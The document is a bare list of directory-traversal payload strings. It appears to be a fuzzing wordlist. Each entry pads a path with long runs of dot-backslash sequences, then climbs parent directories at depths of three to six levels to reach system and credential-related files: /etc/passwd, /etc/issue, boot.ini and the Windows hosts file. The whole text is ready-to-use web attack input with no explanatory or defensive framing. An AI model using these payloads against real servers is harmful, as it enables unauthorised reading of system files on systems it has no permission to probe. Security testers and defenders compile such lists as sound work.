-.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../windows\system32\drivers\etc\hosts -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../../etc\passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../../etc\issue -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\../../../../../../windows\system32\drivers\etc\hosts 